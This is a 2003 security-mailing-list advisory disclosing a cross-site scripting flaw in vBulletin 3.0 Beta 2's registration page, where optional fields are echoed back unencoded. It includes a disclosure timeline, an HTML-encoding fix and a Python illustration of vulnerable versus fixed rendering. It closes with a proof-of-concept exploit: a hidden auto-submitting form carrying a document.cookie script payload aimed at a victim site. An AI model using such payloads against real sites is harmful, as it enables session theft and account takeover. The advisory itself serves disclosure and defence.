[VulnWatch] VBulletin New Member XSS Vulnerability

From: Ferruh Mavituna (ferruh_at_mavituna.com)
Date: 08/08/03

    To: <vulnwatch@vulnwatch.org>
    Date: Fri, 8 Aug 2003 17:53:53 +0300

    ------------------------------------------------------
    VBulletin New Member XSS Vulnerability
    ------------------------------------------------------
    Any kind of XSS attack is possible. With this vulnerability an attacker could
    access other users' and admins' accounts.
    Online URL : http://ferruh.mavituna.com/article.asp?256

    ------------------------------------------------------
    About VBulletin;
    ------------------------------------------------------
    Popular PHP-based forum application

    Vendor & Demo;
    www.vbulletin.com

    ------------------------------------------------------
    Description;
    ------------------------------------------------------
    On the new member page (register.php), if you skip a required field the system
    redirects you back to the same form and, for convenience, fills in the fields
    with the values you entered before. In the standard fields vBulletin handles
    script injection correctly, but not in optional fields like "Interests-Hobbies",
    "Biography", "Occupation" etc., which are echoed back into the form unencoded.

    So you can execute any JS through these fields.

    ------------------------------------------------------
    Vulnerable;
    ------------------------------------------------------
    vBulletin 3.0 Beta 2

    ------------------------------------------------------
    Non Vulnerable;
    ------------------------------------------------------
    vBulletin 2.3.0
    vBulletin 2.2.8 ...

    ------------------------------------------------------
    Vendor Status;
    ------------------------------------------------------
    No answer at the moment.

    ------------------------------------------------------
    History
    ------------------------------------------------------
    Discovered : 15.07.2003
    Vendor Informed : 29.07.2003
    Published : 06.08.2003

    ------------------------------------------------------
    Solution;
    ------------------------------------------------------
    HTML-encoding these optional fields, as is already done for the other inputs, fixes the issue.
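    The following is an added example, not vBulletin's code, that reproduces the bug class
    described above in a few lines of Python: a re-displayed form field echoes the submitted
    value into a value="..." attribute, and only HTML-encoding the value (quotes included)
    stops the attribute breakout. The field name and payload are constructed for illustration.

```python
"""Added example (not vBulletin's code): re-populating a form field without
HTML-encoding it lets a submitted value close the value="..." attribute and
inject markup; encoding the value, as the advisory's solution says, fixes it.
"""
import html
from html.parser import HTMLParser

# Constructed payload of the kind shown in the advisory: closes the value
# attribute, then injects a script element.
PAYLOAD = '"><script>alert(document.cookie)</script>'


def render_field_vulnerable(name: str, value: str) -> str:
    # Mirrors the bug: the previously submitted value is written as-is
    # into the value attribute of the re-displayed registration form.
    return f'<input type="text" name="{name}" value="{value}" />'


def render_field_fixed(name: str, value: str) -> str:
    # The fix: HTML-encode the value like the other inputs. quote=True
    # (the default) also encodes " and ', which is what prevents the
    # attribute breakout rather than just a broken-looking value.
    return f'<input type="text" name="{name}" value="{html.escape(value, quote=True)}" />'


class _TagCollector(HTMLParser):
    """Records the elements a browser-like parser would see in the markup."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[str] = []
        self.input_values: list[str | None] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            # HTMLParser decodes entities in attribute values, so the
            # encoded form round-trips back to the original user text.
            self.input_values.append(dict(attrs).get("value"))


def parse_tags(markup: str):
    parser = _TagCollector()
    parser.feed(markup)
    return parser.tags, parser.input_values


def is_safe(markup: str) -> bool:
    """True when the rendered field is exactly one input and nothing else."""
    tags, _ = parse_tags(markup)
    return tags == ["input"]
```

    The vulnerable renderer yields an input followed by a script element for the payload; the
    fixed renderer yields a single input whose decoded value is the original text, so the user's
    input is preserved without becoming markup.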

    ------------------------------------------------------
    Exploit Code;
    ------------------------------------------------------
    [form action="http://[victim]/register.php?do=register" method="post"
    style="display:none"]
     [input type="hidden" name="s" value="" /]
     [input type="hidden" name="regtype" value="1" /]
     [input type="text" class="bginput" name="field1" value="" size="25"
    maxlength="250" /]
     [input type="hidden" name="url" value="index.php" /]
     [input type="hidden" name="do" value="addmember" /]
    [/form]
    [script]
     //Code that will be executed
     var xss = "\"][script]alert(document"+".cookie)[\/script]";
     document.forms[0].field1.value=xss;
     document.forms[0].submit();
    [/script]

    * Replace [ ] with < >

    Ferruh Mavituna
    ferruh@mavituna.com
    http://ferruh.mavituna.com
    Web Application Security Specialist
